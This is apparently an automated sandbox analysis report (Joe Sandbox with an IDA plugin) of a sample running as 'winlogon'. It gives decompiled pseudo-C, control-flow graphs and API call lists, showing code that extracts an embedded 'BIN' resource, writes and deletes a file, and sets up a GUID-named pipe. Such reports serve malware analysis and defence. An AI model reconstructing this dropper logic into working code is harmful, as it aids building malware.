    0x00d661f4
    0x00d66200
    0x00d6620a
    0x00d66214
    0x00d6622b
    0x00d6623b
    0x00d66242
    0x00d66247
    0x00d6624d
    0x00d66252
    0x00d66261
    0x00d66266
    0x00d66266
    0x00d66269
    0x00d66271
    0x00d66280
    0x00d66285
    0x00d66285
    0x00d66288
    0x00d6628e
    0x00d6628e
    0x00d662a0
    0x00d662a0
    0x00d662a0
    0x00d662a3
    0x00d662a4
    0x00d662ac
    0x00d662af
    0x00d662b3
    0x00d662bc
    0x00d662be
    0x00d662c4
    0x00d662c7
    0x00d662c7
    0x00d662ca
    0x00d662cd
    0x00d662d1
    0x00d662d7
    0x00d662dd
    0x00d662e0
    0x00d662e2
    0x00d662e2
    0x00d662e4
    0x00d662e5
    0x00d662e9
    0x00d662eb
    0x00d662f0
    0x00d662f0
    0x00d662f3
    0x00d662f4
    0x00d662f4
    0x00d662fc
    0x00d662ff
    0x00d66306
    0x00d6630e
    0x00d66321
    0x00d66326
    0x00d66334
    0x00d6633c
    0x00d6636c
    0x00d66376
    0x00d66381
    0x00d6634e
    0x00d6634e
    0x00d66366
    0x00d66366
    0x00d66290
    0x00d66290
    0x00d66292
    0x00d66295
    0x00000000
    0x00d66297
    0x00d66297
    0x00000000
    0x00d66297

    APIs
    • GetVersionExW.KERNEL32(00000114), ref: 00D66145
    • GetVersionExW.KERNEL32(00000114), ref: 00D66188
    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00D661A8
    • GetProcAddress.KERNEL32(00000000), ref: 00D661AF
    • GetCurrentProcess.KERNEL32(?), ref: 00D661D1
    • IsWow64Process.KERNELBASE(00000000), ref: 00D661D8
      • Part of subcall function 00D62EB0: GetCurrentProcess.KERNEL32 ref: 00D62EF9
      • Part of subcall function 00D62EB0: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62F26
    • __Stoull.NTSTC_LIBCMT ref: 00D6622B
    • __Stoull.NTSTC_LIBCMT ref: 00D66242
      • Part of subcall function 00D629D0: GetCurrentProcess.KERNEL32 ref: 00D629F4
      • Part of subcall function 00D629D0: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62A1B
      • Part of subcall function 00D62920: OpenProcessToken.ADVAPI32(?,00000008,FFFFFFFF), ref: 00D62967
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D78B46, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 272

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 327 d78b46-d78b76 call d788a9 330 d78b78-d78b83 call d7210f 327->330 331 d78b91-d78b9d call d76d1b 327->331 336 d78b85-d78b8c call d72122 330->336 337 d78bb6-d78bff call d78814 331->337 338 d78b9f-d78bb4 call d7210f call d72122 331->338 345 d78e68-d78e6e 336->345 346 d78c01-d78c0a 337->346 347 d78c6c-d78c75 GetFileType 337->347 338->336 349 d78c41-d78c67 GetLastError call d720ec 346->349 350 d78c0c-d78c10 346->350 352 d78c77-d78ca8 GetLastError call d720ec CloseHandle 347->352 353 d78cbe-d78cc1 347->353 349->336 350->349 354 d78c12-d78c3f call d78814 350->354 352->336 366 d78cae-d78cb9 call d72122 352->366 355 d78cca-d78cd0 353->355 356 d78cc3-d78cc8 353->356 354->347 354->349 359 d78cd4-d78d22 call d76c64 355->359 360 d78cd2 355->360 356->359 370 d78d32-d78d56 call d785c7 359->370 371 d78d24-d78d30 call d78a25 359->371 360->359 366->336 376 d78d69-d78dac 370->376 377 d78d58 370->377 371->370 378 d78d5a-d78d64 call d7294f 371->378 380 d78dcd-d78ddb 376->380 381 d78dae-d78db2 376->381 377->378 378->345 384 d78e66 380->384 385 d78de1-d78de5 380->385 381->380 383 d78db4-d78dc8 381->383 383->380 384->345 385->384 386 d78de7-d78e1a CloseHandle call d78814 385->386 389 d78e1c-d78e48 GetLastError call d720ec call d76e2d 386->389 390 d78e4e-d78e62 386->390 389->390 390->384
    C-Code - Quality: 42%
    			E00D78B46(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				void* _t190;
				signed int* _t191;
				signed int _t193;
				char _t198;
				signed int _t204;
				signed int _t207;
				signed int _t216;
				signed int _t218;
				signed int _t220;
				signed int _t226;
				signed int _t228;
				signed int _t235;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed char _t243;
				intOrPtr _t246;
				void* _t249;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E00D788A9(__ecx,  &_v72, _a16, _a20, _a24);
				_t193 = 6;
				memcpy( &_v48, _t263, _t193 << 2);
				_t275 = _t273 + 0x1c;
				_t249 = _t263 + _t193 + _t193;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00D76D1B(_t190, _t249, _t264, __eflags);
					_t191 = _a8;
					 *_t191 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t198 = 0;
						_t122 = E00D78814(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00D76C64(_t198,  *_t191, _t253);
								_t243 = _v5 | 0x00000001;
								_v5 = _t243;
								_v48 = _t243;
								 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) = _t243;
								_t204 =  *_t191;
								_t206 = (_t204 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xd91260 + (_t204 >> 6) * 4)) + 0x29 + (_t204 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t207 = 6;
									_push( *_t191);
									memcpy(_t279,  &_v48, _t207 << 2);
									_t134 = E00D785C7(_t191,  &_v48 + _t207 + _t207,  &_v48);
									_t281 = _t279 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x29 + ( *_t191 & 0x0000003f) * 0x30)) = _v6;
										 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x2d + ( *_t191 & 0x0000003f) * 0x30)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t226 =  *_t191;
												_t228 = (_t226 & 0x0000003f) * 0x30;
												_t164 =  *((intOrPtr*)(0xd91260 + (_t226 >> 6) * 4));
												_t87 = _t164 + _t228 + 0x28;
												 *_t87 =  *(_t164 + _t228 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t267 = _v44;
										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
										if((_t267 & 0xc0000000) != 0xc0000000) {
											L31:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L31;
											}
											CloseHandle(_v12);
											_v44 = _t267 & 0x7fffffff;
											_t216 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t216 << 2);
											_t246 = E00D78814();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t218 =  *_t191;
												_t220 = (_t218 & 0x0000003f) * 0x30;
												__eflags = _t220;
												 *((intOrPtr*)( *((intOrPtr*)(0xd91260 + (_t218 >> 6) * 4)) + _t220 + 0x18)) = _t246;
												goto L31;
											}
											E00D720EC(GetLastError());
											 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
											E00D76E2D( *_t191);
											L10:
											goto L2;
										}
									}
									_t270 = _t134;
									goto L22;
								} else {
									_t270 = E00D78A25(_t206,  *_t191);
									__eflags = _t270;
									if(__eflags != 0) {
										L22:
										E00D7294F(__eflags,  *_t191);
										return _t270;
									}
									goto L20;
								}
							}
							_t271 = GetLastError();
							E00D720EC(_t271);
							 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00D72122())) = 0xd;
							}
							goto L2;
						}
						_t235 = _v44;
						__eflags = (_t235 & 0xc0000000) - 0xc0000000;
						if((_t235 & 0xc0000000) != 0xc0000000) {
							L9:
							_t236 =  *_t191;
							_t238 = (_t236 & 0x0000003f) * 0x30;
							_t180 =  *((intOrPtr*)(0xd91260 + (_t236 >> 6) * 4));
							_t33 = _t180 + _t238 + 0x28;
							 *_t33 =  *(_t180 + _t238 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00D720EC(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t235 & 0x7fffffff;
						_t240 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t240 << 2);
						_t198 = 0;
						_t253 = E00D78814();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00D7210F()) =  *_t186 & 0x00000000;
						 *_t191 = _t264;
						 *((intOrPtr*)(E00D72122())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00D7210F()) =  *_t188 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00D72122()));
				}
			}























































    0x00d78b69
    0x00d78b6d
    0x00d78b6e
    0x00d78b6e
    0x00d78b6e
    0x00d78b70
    0x00d78b76
    0x00d78b91
    0x00d78b96
    0x00d78b99
    0x00d78b9b
    0x00d78b9d
    0x00d78bbc
    0x00d78bc3
    0x00d78bca
    0x00d78bcd
    0x00d78bd9
    0x00d78bdc
    0x00d78be4
    0x00d78be5
    0x00d78be8
    0x00d78be8
    0x00d78bea
    0x00d78bef
    0x00d78bf1
    0x00d78bf4
    0x00d78bfc
    0x00d78bff
    0x00d78c6c
    0x00d78c6d
    0x00d78c73
    0x00d78c75
    0x00d78cbe
    0x00d78cc1
    0x00d78cca
    0x00d78ccd
    0x00d78cd0
    0x00d78cd2
    0x00d78cd2
    0x00d78cd2
    0x00d78cc3
    0x00d78cc6
    0x00d78cc6
    0x00d78cd7
    0x00d78cda
    0x00d78ce6
    0x00d78ceb
    0x00d78cf7
    0x00d78d01
    0x00d78d05
    0x00d78d0f
    0x00d78d12
    0x00d78d1d
    0x00d78d22
    0x00d78d32
    0x00d78d35
    0x00d78d39
    0x00d78d3a
    0x00d78d40
    0x00d78d45
    0x00d78d48
    0x00d78d4a
    0x00d78d4c
    0x00d78d51
    0x00d78d54
    0x00d78d56
    0x00d78d80
    0x00d78da4
    0x00d78da8
    0x00d78dac
    0x00d78dae
    0x00d78db2
    0x00d78db4
    0x00d78dbe
    0x00d78dc1
    0x00d78dc8
    0x00d78dc8
    0x00d78dc8
    0x00d78dc8
    0x00d78db2
    0x00d78dcd
    0x00d78dd9
    0x00d78ddb
    0x00d78e66
    0x00d78e66
    0x00000000
    0x00d78de1
    0x00d78de1
    0x00d78de5
    0x00000000
    0x00000000
    0x00d78dea
    0x00d78dfc
    0x00d78e04
    0x00d78e07
    0x00d78e08
    0x00d78e0b
    0x00d78e12
    0x00d78e17
    0x00d78e1a
    0x00d78e4e
    0x00d78e58
    0x00d78e58
    0x00d78e62
    0x00000000
    0x00d78e62
    0x00d78e23
    0x00d78e3c
    0x00d78e43
    0x00d78c66
    0x00000000
    0x00d78c66
    0x00d78ddb
    0x00d78d58
    0x00000000
    0x00d78d24
    0x00d78d2b
    0x00d78d2e
    0x00d78d30
    0x00d78d5a
    0x00d78d5c
    0x00000000
    0x00d78d62
    0x00000000
    0x00d78d30
    0x00d78d22
    0x00d78c7d
    0x00d78c80
    0x00d78c9b
    0x00d78ca0
    0x00d78ca6
    0x00d78ca8
    0x00d78cb3
    0x00d78cb3
    0x00000000
    0x00d78ca8
    0x00d78c01
    0x00d78c08
    0x00d78c0a
    0x00d78c41
    0x00d78c41
    0x00d78c4b
    0x00d78c4e
    0x00d78c55
    0x00d78c55
    0x00d78c55
    0x00d78c61
    0x00000000
    0x00d78c61
    0x00d78c0c
    0x00d78c10
    0x00000000
    0x00000000
    0x00d78c12
    0x00d78c21
    0x00d78c26
    0x00d78c29
    0x00d78c2a
    0x00d78c2d
    0x00d78c2d
    0x00d78c34
    0x00d78c36
    0x00d78c39
    0x00d78c3c
    0x00d78c3f
    0x00000000
    0x00000000
    0x00000000
    0x00d78b9f
    0x00d78ba4
    0x00d78ba7
    0x00d78bae
    0x00000000
    0x00d78bae
    0x00d78b78
    0x00d78b7d
    0x00d78b83
    0x00d78b85
    0x00000000
    0x00d78b8a

    APIs
      • Part of subcall function 00D76D1B: EnterCriticalSection.KERNEL32(00000000,00D86CB8,0000001C,00D78B96,?,?,00000000,?,00000000,00D86D78,00000010,00D78B41,?,00000000,?,00D72653), ref: 00D76DC2
      • Part of subcall function 00D76D1B: LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,?,00000000,00D86D78,00000010,00D78B41,?,00000000,?,00D72653,?,00000001), ref: 00D76DCF
      • Part of subcall function 00D78814: CreateFileW.KERNEL32(00000000,00000000,?,00D78BEF,?,?,00000000), ref: 00D78831
    • GetLastError.KERNEL32 ref: 00D78C5A
    • GetFileType.KERNEL32(00000000), ref: 00D78C6D
    • GetLastError.KERNEL32 ref: 00D78C77
    • CloseHandle.KERNEL32(00000000), ref: 00D78CA0
      • Part of subcall function 00D76C64: SetStdHandle.KERNEL32(000000F6,00D78CDF,00000000,?,?,?,?,00D78CDF,?,00000000), ref: 00D76CC3
    • CloseHandle.KERNEL32(?), ref: 00D78DEA
    • GetLastError.KERNEL32 ref: 00D78E1C
      • Part of subcall function 00D76E2D: SetStdHandle.KERNEL32(000000F6,00000000,00000001,00000000,?,?,00D729BD,00000001,?,00D7286D,?,00D86BD0,0000000C), ref: 00D76E8D
      • Part of subcall function 00D7294F: CloseHandle.KERNEL32(00000000), ref: 00D729A5
      • Part of subcall function 00D7294F: GetLastError.KERNEL32(?,00D7286D,?,00D86BD0,0000000C), ref: 00D729AF
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D63230, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 173

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 395 d63230-d6324d 396 d63253-d63255 395->396 397 d6348e-d634a0 call d6abe4 395->397 396->397 398 d6325b-d63282 call d6a670 396->398 403 d6329a-d632cc call d6a3f0 398->403 404 d63284-d63299 call d6abe4 398->404 403->404 409 d632ce-d63309 call d6aad0 403->409 409->404 412 d6330f-d63321 call d6a6f0 409->412 412->404 415 d63327-d63340 call d6a4b0 412->415 415->404 418 d63346-d63350 call d6aa60 415->418 418->397 421 d63356-d63373 call d6a840 418->421 421->397 424 d63379-d63381 421->424 424->397 425 d63387-d63393 call d6a550 424->425 425->397 428 d63399-d633c7 CoCreateGuid 425->428 428->397 429 d633cd-d633f5 call d6d520 call d6ab90 428->429 429->397 434 d633fb-d6346f call d6d520 wsprintfW call d6d520 wsprintfW call d634b0 429->434 440 d63474-d6348d call d6abe4 434->440
    C-Code - Quality: 69%
    			E00D63230(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a8) {
				signed int _v8;
				char _v9;
				short _v11;
				intOrPtr _v12;
				char _v15;
				char _v16;
				char _v24;
				char _v25;
				short _v27;
				char _v31;
				char _v56;
				short _v636;
				char _v1148;
				short _v2172;
				intOrPtr _v2176;
				char _v2188;
				char _v2192;
				char _v2196;
				signed int _t46;
				void* _t55;
				void* _t60;
				void* _t61;
				char* _t62;
				intOrPtr* _t82;
				char* _t86;
				signed int _t114;

				_t46 =  *0xd88004; // 0x276b9783
				_v8 = _t46 ^ _t114;
				_t82 = _a8;
				if(__edx == 0 || _t82 == 0) {
					L15:
					return E00D6ABE4(_v8 ^ _t114);
				} else {
					asm("xorps xmm0, xmm0");
					_v24 = 0;
					asm("movq [ebp-0x13], xmm0");
					_v15 = 0;
					_v11 = 0;
					_v9 = 0;
					if(E00D6A670(_t82,  &_v24) != 0) {
						asm("xorps xmm0, xmm0");
						_v56 = 0;
						asm("movq [ebp-0x23], xmm0");
						_t86 =  &_v56;
						_v31 = 0;
						asm("movups [ebp-0x33], xmm0");
						_v27 = 0;
						_v25 = 0;
						if(E00D6A3F0(_t86,  &_v24) == 0) {
							goto L3;
						} else {
							_push(_t86);
							_v2196 = 0;
							_v2192 = 0;
							_v16 = 0;
							_v12 = 0;
							_t55 = E00D6AAD0(L"BIN", __edx,  &_v2196); // executed
							if(_t55 == 0) {
								goto L3;
							} else {
								_t112 = _v2192;
								_t90 = _v2192;
								if(E00D6A6F0(_v2192,  &_v16) == 0 || E00D6A4B0(_t82,  &_v2196,  &_v16, __edi, _t112, _t112, _t90,  &_v56) == 0) {
									goto L3;
								} else {
									if(E00D6AA60( &_v16) == 0) {
										goto L15;
									} else {
										_v2192 = 0;
										_t60 = E00D6A840(_t82,  &_v2192, _t112); // executed
										if(_t60 == 0) {
											goto L15;
										} else {
											_t109 = _v2192;
											if(_v2192 == 0) {
												goto L15;
											} else {
												_t61 = E00D6A550(_t109,  &_v16); // executed
												if(_t61 == 0) {
													goto L15;
												} else {
													_t62 =  &_v2188;
													_v2188 = 0;
													asm("xorps xmm0, xmm0");
													_v2176 = 0;
													asm("movq [ebp-0x884], xmm0"); // executed
													__imp__CoCreateGuid(_t62); // executed
													if(_t62 != 0) {
														goto L15;
													} else {
														E00D6D520(_t109,  &_v1148, _t62, 0x200);
														if(E00D6AB90( &_v2188,  &_v1148) == 0) {
															goto L15;
														} else {
															E00D6D520(_t109,  &_v636, 0, 0x240);
															wsprintfW( &_v636, L"\\\\.\\pipe\\%ls",  &_v1148);
															E00D6D520(_t109,  &_v2172, 0, 0x400);
															wsprintfW( &_v2172, L" %ls %ls", L"123",  &_v636);
															E00D634B0( &_v636, _t109,  &_v2172, _t82); // executed
															asm("sbb eax, eax");
															return E00D6ABE4(_v8 ^ _t114);
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						L3:
						return E00D6ABE4(_v8 ^ _t114);
					}
				}
			}





























    0x00d63239
    0x00d63240
    0x00d63244
    0x00d6324d
    0x00d6348e
    0x00d634a0
    0x00d6325b
    0x00d6325b
    0x00d6325e
    0x00d63265
    0x00d6326a
    0x00d63271
    0x00d63277
    0x00d63282
    0x00d6329a
    0x00d6329d
    0x00d632a5
    0x00d632aa
    0x00d632ad
    0x00d632b4
    0x00d632b8
    0x00d632be
    0x00d632cc
    0x00000000
    0x00d632ce
    0x00d632ce
    0x00d632d5
    0x00d632e2
    0x00d632f1
    0x00d632f8
    0x00d632ff
    0x00d63309
    0x00000000
    0x00d6330f
    0x00d6330f
    0x00d63318
    0x00d63321
    0x00000000
    0x00d63346
    0x00d63350
    0x00000000
    0x00d63356
    0x00d63359
    0x00d63369
    0x00d63373
    0x00000000
    0x00d63379
    0x00d63379
    0x00d63381
    0x00000000
    0x00d63387
    0x00d6338c
    0x00d63393
    0x00000000
    0x00d63399
    0x00d63399
    0x00d6339f
    0x00d633a9
    0x00d633ac
    0x00d633b7
    0x00d633bf
    0x00d633c7
    0x00000000
    0x00d633cd
    0x00d633da
    0x00d633f5
    0x00000000
    0x00d633fb
    0x00d63409
    0x00d6342a
    0x00d6343d
    0x00d6345d
    0x00d6346f
    0x00d63479
    0x00d6348d
    0x00d6348d
    0x00d633f5
    0x00d633c7
    0x00d63393
    0x00d63381
    0x00d63373
    0x00d63350
    0x00d63321
    0x00d63309
    0x00d63284
    0x00d63284
    0x00d63299
    0x00d63299
    0x00d63282

    APIs
      • Part of subcall function 00D6AAD0: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,00D631A7,?), ref: 00D6AB08
      • Part of subcall function 00D6AAD0: FindResourceW.KERNEL32(00000000,?,?), ref: 00D6AB19
      • Part of subcall function 00D6AAD0: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB27
      • Part of subcall function 00D6AAD0: LockResource.KERNEL32(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB32
      • Part of subcall function 00D6AAD0: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB41
      • Part of subcall function 00D6A6F0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
      • Part of subcall function 00D6A6F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
      • Part of subcall function 00D6A550: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D6A573
      • Part of subcall function 00D6A550: WriteFile.KERNEL32(00000000,?,?,00D63200,00000000), ref: 00D6A59F
      • Part of subcall function 00D6A550: CloseHandle.KERNEL32(00000000), ref: 00D6A5A8
      • Part of subcall function 00D6A550: DeleteFileW.KERNEL32(?,?,?), ref: 00D6A5B3
    • CoCreateGuid.OLE32(?), ref: 00D633BF
      • Part of subcall function 00D6AB90: wsprintfW.USER32 ref: 00D6ABD2
    • wsprintfW.USER32 ref: 00D6342A
    • wsprintfW.USER32 ref: 00D6345D
      • Part of subcall function 00D634B0: CreateNamedPipeW.KERNELBASE(?,40000001,00000000,00000001,00000000,00019000,0000EA60,00000000,00000000,773F423D,?), ref: 00D634EB
      • Part of subcall function 00D634B0: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D63527
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63535
      • Part of subcall function 00D634B0: ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00D63549
      • Part of subcall function 00D634B0: GetLastError.KERNEL32 ref: 00D63551
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63599
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D6359E
      • Part of subcall function 00D634B0: WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00D635C6
      • Part of subcall function 00D634B0: GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D635DA
      • Part of subcall function 00D634B0: CancelIo.KERNEL32(00000000), ref: 00D635E5
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D635F5
      • Part of subcall function 00D634B0: ReadFile.KERNEL32(00000000,00000000,00019000,00000000,00000000), ref: 00D6363A
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63685
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D6A670: __Stoull.NTSTC_LIBCMT ref: 00D6A697
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd
    Function 00D671E0, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103

    Control-flow Graph

    C-Code - Quality: 48%
    			E00D671E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				WCHAR* _v8;
				char _v16;
				signed int _v20;
				short _v2068;
				intOrPtr _v2072;
				intOrPtr _v2076;
				char _v5164;
				char _v6188;
				char _v7212;
				struct _CRITICAL_SECTION _v7636;
				char _v7644;
				char _v7648;
				WCHAR* _v7652;
				WCHAR* _v7656;
				void* __ebp;
				signed int _t33;
				signed int _t34;
				intOrPtr _t41;
				char* _t69;
				void* _t79;
				signed int _t87;
				void* _t93;

				_t93 = __eflags;
				_t84 = __esi;
				_t83 = __edi;
				_t79 = __edx;
				_t65 = __ebx;
				_push(0xffffffff);
				_push(E00D7E42B);
				_push( *[fs:0x0]);
				E00D7D900();
				_t33 =  *0xd88004; // 0x276b9783
				_t34 = _t33 ^ _t87;
				_v20 = _t34;
				_push(__esi);
				_push(_t34);
				 *[fs:0x0] =  &_v16;
				GetCurrentProcessId();
				E00D66390( &_v7648);
				_v8 = 0;
				if(E00D66500(__ebx,  &_v7648, _t79, __edi, __esi, _t93) != 0) {
					E00D666C0(__ebx, __edi, __esi, __eflags); // executed
					__eflags = _v2076;
					if(__eflags != 0) {
						E00D658E0(__ebx, __edi, __esi, __eflags);
					}
					__eflags = _v2072;
					if(__eflags != 0) {
						E00D65B80(_t65, _t83, _t84, __eflags); // executed
					}
					E00D665A0(_t65,  &_v7648, _t83, _t84); // executed
					_t69 =  &_v6188;
					_t41 = E00D64040(_t65, _t69, _t83, _t84); // executed
					__eflags = _t41;
					if(_t41 != 0) {
						_t69 =  &_v7648;
						E00D61FB0(_t65, _t69, _t83, _t84,  &_v6188); // executed
					}
					_push(_t69);
					E00D63F30(_t65, 0x68, _t83, _t84,  &_v7212); // executed
					E00D63F30(_t65, 0x69, _t83, _t84,  &_v5164); // executed
					_v7652 = 0;
					_v7656 = 0;
					E00D64220( &_v5164, _t69,  &_v7656,  &_v7652); // executed
					L00D66ED0(_t65,  &_v7648, _t83, _t84,  &_v6188); // executed
					E00D6D520(_t83,  &_v2068, 0, 0x800);
					GetModuleFileNameW(GetModuleHandleW(0),  &_v2068, 0x3ff);
					E00D65DD0(_t65, 0xbb8,  &_v2068, _t83, _t84);
					__eflags = 0;
				}
				__imp__#116();
				_v7644 = _v7648;
				DeleteCriticalSection( &_v7636);
				E00D68340(_t65,  &_v7648, _t83);
				 *[fs:0x0] = _v16;
				return E00D6ABE4(_v20 ^ _t87);
			}

























    0x00d671e0
    0x00d671e0
    0x00d671e0
    0x00d671e0
    0x00d671e0
    0x00d671e3
    0x00d671e5
    0x00d671f0
    0x00d671f6
    0x00d671fb
    0x00d67200
    0x00d67202
    0x00d67205
    0x00d67206
    0x00d6720a
    0x00d67210
